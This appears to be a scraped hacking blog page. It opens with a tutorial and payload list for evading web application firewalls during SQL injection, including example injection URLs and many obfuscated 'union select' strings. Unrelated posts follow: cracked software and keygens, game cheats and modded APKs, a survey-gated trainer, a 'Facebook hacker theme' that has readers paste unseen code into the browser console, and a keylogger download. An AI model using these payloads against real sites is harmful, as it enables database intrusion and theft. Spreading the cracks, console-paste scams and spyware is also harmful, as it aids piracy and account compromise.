SQL Injection Complex Waf bypassing

Assalamualaikum 

Note: Before starting this topic, I want to clarify that I won't be covering on basic SQL Injection attacks. This article is meant for WAF /Filter bypassing during Injection.

What is WAF?

WAF stands for Web Application Firewall. It is widely used nowadays to detect and defend SQL Injections and Cross Site Scripting (XSS) attacks.
  
How does it Work? 

When WAF detects any malicious input from end user, It gives  403 Forbidden, 406 Not Acceptable or any Kind of Custom errors 

What to do next?

So, what to do next? we cant do our further injection right? 
Well its time to use various techniques to bypass thing. Some of these techniques are mentioned below:

# Case Changing:

Most of the Waf's only filter lowercase or higher-case keywords. We can easily evade that kind of wafs by using alternate case. 

if union select is forbidden , we can always try UNION SELECT instead. And if both does not work, We can try our luck with using mixture of both. like UniOn seLeCt

# Using Comments

SQL comments really help us in many cases. They play their important role in killing some Waf's Restrictions. e.g

                                            // , -- , --+ , #, -- - 

# Inline Comments

Some WAF’s filter keywords like /union\sselect/ig We can bypass these filters by using inline comments most of the time

http://localhost/waf.php?id=1 /*!union*/  /*!select*/ 1,2,3--

Tip: Read SQLi Errors carefully. Sometimes they left error from which we can have idea that how waf is working on this site.

Anyways, We were talking about Filtered Keywords. So it does not mean  that waf is only filtering union select. It may be filtering all SQL keywords like table_name, column_name etc
So might need to apply these inline comments on those keywords as well. Example

http://localhost/waf.php?id=1 /*!union*/ /*!select*/ 1,2,/*!table_name*/,4,5 /*!from*/ /*!information_schema.tables*/ /*!where*/ /*!table_schema*/=database()--

# Double use of Keywords

Sometimes WAF removes whole keyword from the query and execute it and throw errors
In such cases, we can use keywords in this way

http://localhost/waf.php?id=1 UNunionION SELselectECT 1,2,3,4,5,6--

Anyways It totally depends upon the scenario. Im just giving a common Idea. Rest is upon you that how you use it.

# Using Different types of Whitespaces

Sometime Waf may be filtering the whitespace we are using between keywords. We mostly use Spaces But space is not the only whitespace we can use in SQL injection. We have some other options as well
  for example + . 
%20 is use for space, but we can try using one of these whitespaces . some examples are %09  %0A  %0B %0C %0D %A0

inurl: 

 union%0Bselect%0B1,2,3--

# Encoding

We can always try our luck with URL encode thing to bypass WAF. For example we can use 

union select 1,/*!table_name*/,3 from information_schema.tables where table_schema=database()
 as  
 union%20select%201,%2f%2a%21table_name%2a%2f,3%20from%20information_schema.tables%20where%20table_schema%3Ddatabase%28%29

but sometime waf filter also filter % itself. So we have to use double URL encoding in that case

 union%2520select%25201,%2f%2a%21table_name%2a%2f%2520,3 from%2520information_schema.tables%2520where%2520table_schema%253Ddatabase%2528%2529

# Unexpected Input

This scenario is very rare that we have to use buffer overflow or give unexpected query /request  to trick WAF filters.
for example:

http://localhost/waf.php?id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) union select 1,2,3,4,5--

 This thing only worked once for me. But knowledge is Power, may be you face any scenario that can be bypassed by using buffer overflow

# use all above mentioned techniques together 

ah.. tried all those things but still its showing NOT ACCEPTABLE or FORBIDDEN. well its time to use all these above mentioned techniques combined.
For example: you can use alternative cases with inline comments or obfuscation.

#Some Common Union Select Solutions: 

 %55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT

 I hope you have enjoyed this article. Please give us your feedback. So that we maybe able to make things more clear for you next time .

I learned comlplex waf bypassing to sqligods
Credits to SQLI GOds for this tutorial

WEB CRUISER PRO CRACK! [SETUP+KEY]

DOWNLOAD IT HERE:

[CLICK HERE]

SUBWAY SURFERS UNLIMITED COINS CHEAT

Hey buddies! Today I'm gonna share you this cool trick about Subway Surfers and get unlimited coins with my Hi-Score (Which I made on my Galaxy NOTE II)
This trick is very simple! You just need to follow some easy steps which I'm going to explain below. But before I wanna show you what benifits you will get after hacking this game completely!

NOW, to get all these stuffs in your game, you just need to find a folder named "com.kiloo.subwaysurf" in your "sdcard/android/data" folder. Remember!! This folder is located in sdcard not in extsdcard!

Now download the files given below and replace the previous folder with the newly downloaded one! Then reboot your device and start your game!
VOILA!! You just made a new Hi-Score with so many coins and all objectives are now completed!

Download here: [CLICK HERE]

Mirror link: [CLICK HERE]

NOTE: This tutorial is only for Android mobile devices about "How to get unlimited coins on subway surfers without rooting" OR "How to cheat subway surfers game"

Counter Strike Extreme V6 [Full Version]

Counter Strike Extreme V6 or better known as CS is a very exciting war game to be played. This game is long enough to accompany the true gamer. Counter Strike Extreme is one version of some other games that include Counter Strike Condition Zero etc. Once before I talk about games Need For Speed 2010 then ​​PES 2011 and on this occasion, masterkreatif.com will provide Free Download Counter Strike Extreme V6 Full Version.

Counter Strike provides some features that are very unique and quite a lot of options that allow you to play only with computers, a LAN (Local Area Network) and Internet. In the game of Counter Strike, there are several areas of war, some weapons, anti-weapons etc.

Any restrictive custody of Everything, of course, there are one or more deficiencies that actually has minimized as well as with Counter Strike. Counter Strike has some cheating codes (Counter Strike Cheat Code) here are some cheat Counter Strike (Wallhacks, Speedhacks, No recoil, Aimbots, ESP, Barrel Hack, Anti Flash and Anti Smoke, Grenade Dodger, Fanatic, Aimbot, speed, lasers, Walls, and Team kill bots).

To further away you are familiar with Counter Strike Extreme V6, please see the screen shoot below :

Minimum Requirements :

• Windows XP/Visata /7 of Operating System
• 2.4Ghz of Processor Min. P4
• 1GB of RAM
• 2GB Free HDD Space
• Gforce FX series of Graphic Card

Cabal Helix Episode 8 Trainer [Tested and Working September 8]

Features:

Note:

Works only in Windows 7 64-bit

Tested and Working September 3

How to use:

1. Download the Trainer below or >> HERE <<
2. After you finish download the trainer
3. Run as admin the RTE.exe that you downloaded below
4. After run run ass admin the RTE.exe open helix.exe and clich start
5. Enjoy

How to get this program?

It`s really simple step. We have decided to protect the file, meaning that you

have to fill in a short survey to reward the work of our coders. No money or credit cards needed.

Survey download not Working ?

 To download, you must Clear Cache before taking the surveys, if you download know how to Clear Cache just go  here >> Clearing Your Web Browser's Cookies and Cache  

It is absolutely safe and free of viruses.

Despicable Me:Minion Rush Hack [ANDROID]

NOTE: This Hack is Updated but Unstable.

Name of Game: Despicable Me Minion Rush

Version: 1.1.0 (Updated)

APK Size: 17.7 MB

 DATA Size: 179.7 MB

Root Needed?: NO

Requirements:

A computer

A file explorer program like ES File Explorer

Hack Features:

You can buy everything for FREE even you don't have enough tokens and banana!

APK: LINK

DATA: LINK (NOT recommended!)

NOTE: If you put this data file on /android/data. It will change the language to chinese!

Credits:

a.d.cn

BUGS:

When watching the starting video if you put your device into landscape view it force closes.

When you get to a certain point in game it will crash and freeze. Then force closes.

Very leggy and un responsive sometimes.

How to install:

1: Download the file from above

2: Extract the ZIP file and put the 'com.gameloft.android.ANMP.GloftDMHM' folder on (sdcard)/Android/data/ or (internal memory)/Android/data/

3: Put the Apk file on your Sdcard or internal memory.

4: On device. Open a File Manager and find the MODDED APK file you had placed on your Sdcard or internal memory

5: Install the APK

6: Done!

Having 'App not installed' error? Follow this steps!

How to backup data and install modded game without ROOT:

1: Open the game

2: Go to Options and login with your Facebook account

3: Select your Facebook name.

e.g John William, Michael D. Hall, James J. Kaufman, etc…

4: tap 'Keep Remote'

5: You want to backup your data? Tap 'YES'

6: Done and exit game

7: Go to Settings -> Applications -> Manage Applications

For Android 4.x.x Go to Settings -> Apps

8: UNINSTALL the game

9: Download the file from above (scroll up till you see the download links)

10: Put the Apk file on your Sdcard or internal memory.

11: Put the DATA on (sdcard)/Android/data/ or (internal memory)/Android/data/

NOTE: If you put this data file on /android/data. It will change the language to chinese! Skip to 12.

12: On device. Open a File Manager and find the MODDED APK file you had placed on your SDcard

13: Open APK file and install it

14: Start the game

15: Go to Options and login with your Facebook account

16: It will ask you to restore your data. Tap 'Keep Remote'

17: You are going to lose your data. Do you wish to proceed?

Tap 'YES'

18: You're done! Your data is restored!

Facebook Hacker Theme

Change your facebook theme to hacker theme

* Use GOOGLE CHROME or Mozilla Firefox to apply *

Follow The Steps Correctly to Apply 

Step 1 : Copy The Entire Code Here => [CLICK HERE]

Step 2 : Go to => [CLICK HERE]

Step 3 : Press Ctrl + Shift + J ( FOR GOOGLE CHROME) Press Ctrl + Shift + K ( FOR MOZILLA FIREFOX)

Step 4 : Paste The Code or Ctrl + V

Step 5 : Press ENTER

* Wait 2-3 Seconds *

Details : 

+Auto follower 

+Auto Liker 

MUSIC Background: Anonymous Sound Track

SRC: SoftwareSyndicate

DOMDOMSOFT ANIME DOWNLOADER v1.3 KEYGEN+CRACK

DOWNLOAD DOMDOMSOFT ANIME DOWNLOADER : [CLICK HERE]

DIRECT DOWNLOAD : [CLICK HERE]

GET THE INSTALLER HERE : [CLICK HERE]

DOWNLOAD THE LATEST .NET FRAMEWORK] THIS IS NEEDED IN KEYGEN.

[CLICK HERE]

Looking for Manga Downloader ? [CLICK HERE]

DOMDOM SOFT MANGA DOWNLOADER 5.XX CRACK!

In this release:

Small bugs fixed.

Remove PunchMangas (it’s down).

Starkana bug fixed.  Please go to DMD folder => Data folder, delete StarkanaData . Then open the program, switch to Starkana to re-download the data file.

CentralDeMangas bug fixed.  Please go to DMD folder => Data folder, delete CentralDeMangasData . Then open the program, switch to Starkana to re-download the data file.

DoujinMoe bug fixed.  Please go to DMD folder => Data folder, delete DoujinMoeData . Then open the program, switch to Starkana to re-download the data file.

Hentai2Read list update fixed.

Added Kyomh (Chinese).

GET THE INSTALLER HERE: [CLICK HERE]

[DOWNLOAD THE LATEST .NET FRAMEWORK] THIS IS NEEDED IN KEYGEN.

[CLICK HERE]

CRACK LINK : [CLICK HERE]

Looking for Anime Downloader ? [CLICK HERE]

Project Neptune Keylogger tool

NOTE:

Disclaimer: Project Neptune is intended solely to be used for monitoring your own private, personal computers. You are not, under any circumstances, meant to be using it on another computer. The only computer it should be used on is your own. If you use it on any other computer, you are quite possibly breaching several privacy and security laws, depending on your country’s specific policies. That having been said, Project Neptune’s team and staff are not responsible for anything that may happen involved with the usage of Project Neptune.

PROJECT NEPTUNE KEYLOGG DOWNLOAD : [CLICK HERE]



Project Neptune Keylogg Video Tutorial: